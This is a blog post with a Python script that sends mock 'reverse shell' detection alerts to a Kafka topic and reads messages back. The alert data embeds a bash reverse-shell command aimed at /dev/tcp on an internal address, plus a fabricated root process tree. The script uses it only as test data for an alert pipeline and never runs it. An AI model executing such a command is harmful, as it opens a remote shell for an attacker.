Python操作kafka

Reads: 1258 Edit

# -*- coding: utf-8 -*-
"""
@author: Carey
@Created on: 2021/10/13 20:33
"""
import datetime
import json
import random
import time
import uuid
import logging

logging.basicConfig(level=logging.INFO)

from kafka import KafkaProducer, KafkaConsumer, KafkaAdminClient

# Kafka broker address list; passed to both KafkaProducer and KafkaConsumer.
bootstrap_servers = ['10.33.70.110:9092']
# SASL credentials. They are only referenced by the commented-out SASL
# options in kafka_producer()/kafka_consumer(), so they are currently unused.
username = ""
password = ""
# Topic that sample events are produced to and consumed from.
topic = "waf01"
# Consumer group id used by kafka_consumer().
group_id = "waf001"


def kafka_producer():
    """Create a KafkaProducer connected to ``bootstrap_servers``.

    Message values are serialised as UTF-8 encoded JSON, so callers pass
    plain JSON-serialisable objects (e.g. dicts) to ``producer.send``.

    Returns:
        KafkaProducer: a ready-to-use producer. The caller is responsible
        for closing it.
    """
    # To enable SASL/PLAIN authentication, additionally pass:
    #   security_protocol='SASL_PLAINTEXT',
    #   sasl_mechanism='PLAIN',
    #   sasl_plain_username=username,
    #   sasl_plain_password=password,
    # (The original also called producer.metrics() and discarded the result;
    # that dead call has been removed.)
    return KafkaProducer(
        value_serializer=lambda v: json.dumps(v).encode('utf-8'),
        bootstrap_servers=bootstrap_servers,
    )


def send_topic_msg(producer, json_data):
    """Publish ``json_data`` to the module-level ``topic``.

    Args:
        producer: object exposing ``send(topic, value)``; here the
            KafkaProducer created by ``kafka_producer()``.
        json_data: the message value, serialised by the producer's
            ``value_serializer``.

    Returns:
        Whatever ``producer.send`` returns (for kafka-python, a future that
        resolves to the record metadata). Returning it lets callers wait for
        or check delivery; callers that ignore the result are unaffected.
    """
    return producer.send(topic, json_data)


def kafka_data_random() -> dict:
    """Build one sample "reverse shell" detection event.

    Despite the name, nothing is randomised: every field is a fixed sample
    value except ``store_time`` and ``create_time``, which are both set to
    the current Unix time in whole seconds.

    Returns:
        dict: a JSON-serialisable event with the top-level keys
        ``payload_id``, ``payload_index``, ``operation`` and ``payload``.
    """
    source_ip = "10.33.40.64"
    dest_ip = "192.168.0.1"
    shell_port = 30025
    now_ts = int(datetime.datetime.now().timestamp())
    reverse_shell_cmd = f"bash -c bash -i >& /dev/tcp/{dest_ip}/{shell_port} 0>&1"

    def process_entry(ppid, pid, path, name, cmd):
        # Every process in the sample tree is owned by root with mode 100755;
        # only the ids, path, name and command line vary.
        return {
            "user_name": "root",
            "uid": 0,
            "ppid": ppid,
            "pid": pid,
            "path": path,
            "name": name,
            "group_name": "root",
            "file_mode": "100755",
            "euid_user_name": "root",
            "cmd": cmd,
        }

    # Ancestry chain from systemd (pid 1) down to the interactive shell.
    process_tree = [
        process_entry(0, 1, "/usr/lib/systemd/systemd", "systemd",
                      "/usr/lib/systemd/systemd --system --deserialize 15"),
        process_entry(1, 1530, "/usr/sbin/sshd", "sshd", "/usr/sbin/sshd -D"),
        process_entry(1530, 969220, "/usr/sbin/sshd", "sshd", "sshd: root@pts/0"),
        process_entry(969220, 969222, "/usr/bin/bash", "bash", "-bash"),
        process_entry(969222, 969991, "/usr/bin/bash", "sh",
                      f"sh start.sh {dest_ip} {shell_port}"),
        process_entry(969991, 969992, "/usr/bin/bash", "bash", reverse_shell_cmd),
        process_entry(969992, 969993, "/usr/bin/bash", "bash", "bash -i"),
    ]

    std_io = [
        {"type": stream, "ip": source_ip, "port": shell_port}
        for stream in ("stdin", "stdout")
    ]

    # Key order is kept as in the original literal so the serialised JSON
    # is unchanged.
    payload = {
        "parent_name": "bash",
        "agent_id": "61150a9f5d41da6a",
        "pid": 969993,
        "parent_cmd": reverse_shell_cmd,
        "remark": None,
        "type": "反弹shell",
        "std_io": std_io,
        "result": "未处理",
        "internal_ip": dest_ip,
        "target_port": shell_port,
        "path": "/usr/bin/bash",
        "uid": "0",
        "charge_name": None,
        "host_location": None,
        "group_relate_name": "开发测试组",
        "store_time": now_ts,
        "parent_pid": 969992,
        "parent_path": "/usr/bin/bash",
        "external_ip": source_ip,
        "group": "root",
        "severity": "高危",
        "host_ip": dest_ip,
        "asset_number": None,
        "create_time": now_ts,
        "charge_email": None,
        "pname": "bash",
        "com_id": "1a16d9d267c1ac3397c9",
        "ips": [
            "fe80::250:56ff:fe81:e855", dest_ip,
            "fe80::250:56ff:fe81:af60", dest_ip,
            "fe80::250:56ff:fe81:9ac6", source_ip,
        ],
        "group_id": 3,
        "host_tag_map": {},
        "target_ip": "10.233.131.64",
        "os_type": "linux",
        "detail": f"主机 {source_ip} 发生反弹Shell,连接目标为{dest_ip}:60001",
        "source_id": "611caae1cec4b14eea56be7f",
        "user": "root",
        "process_tree": process_tree,
        "host_name": "SEVP-APP-15",
        "node_id": "774c4e47683041686148",
        "node_name": "189java",
    }

    return {
        "payload_id": f"{topic} caae11a67280125f97a6f",
        "payload_index": "detect_bounce_shell",
        "operation": "insert",
        "payload": payload,
    }


def kafka_consumer():
    """Consume messages from ``topic`` and print them until interrupted.

    Connects to ``bootstrap_servers`` as a member of consumer group
    ``group_id``, prints the topics returned by ``consumer.topics()``,
    subscribes to ``topic`` and then polls forever, printing each polled
    batch and every message in it. The function only returns by raising
    (e.g. ``KeyboardInterrupt``); the consumer is closed on the way out.
    """
    # To enable SASL/PLAIN authentication, additionally pass:
    #   security_protocol='SASL_PLAINTEXT',
    #   sasl_mechanism='PLAIN',
    #   sasl_plain_username=username,
    #   sasl_plain_password=password,
    consumer = KafkaConsumer(
        client_id="Consumer-secker-01",
        group_id=group_id,
        bootstrap_servers=bootstrap_servers,
        session_timeout_ms=10000,
        heartbeat_interval_ms=3000,
        enable_auto_commit=True,
        # 'smallest' is a deprecated alias; 'earliest' is the supported
        # spelling for "start from the oldest available offset".
        auto_offset_reset='earliest',
        # Values are left as raw bytes; add a value_deserializer such as
        # ``lambda m: json.loads(m.decode('utf-8'))`` to decode them.
    )
    try:
        print("###########", consumer.topics())
        consumer.subscribe([topic])
        while True:
            # poll() returns a mapping of partition -> list of records;
            # it is empty when nothing arrived within the timeout.
            msg_batch = consumer.poll(timeout_ms=1000)
            print(msg_batch)
            for partition_batch in msg_batch.values():
                for msg in partition_batch:
                    print(f"{msg.topic=}, {msg.partition=}, {msg.offset=}, {msg.value=}")
    finally:
        # Always release the connection and leave the group cleanly, even
        # when the loop is interrupted by an exception or Ctrl-C.
        consumer.close()


# Demo driver: publish 30 sample events, one per second, and report how long
# the run took.
producer = kafka_producer()
starttime = datetime.datetime.now()

try:
    for _ in range(30):
        data = kafka_data_random()
        send_topic_msg(producer, data)
        time.sleep(1)
finally:
    # Close the producer even if building or sending an event fails.
    producer.close()

endtime = datetime.datetime.now()
# The original printed the timedelta followed by the literal text ".seconds";
# print the elapsed time in seconds instead.
print(f"{(endtime - starttime).total_seconds():.3f} seconds")
#---------------
# kafka_consumer()

Comments

Make a comment

www.ultrapower.com ,王硕的博客,专注于研究互联网产品和技术,提供中文精品教程。 本网站与其它任何公司及/或商标无任何形式关联或合作。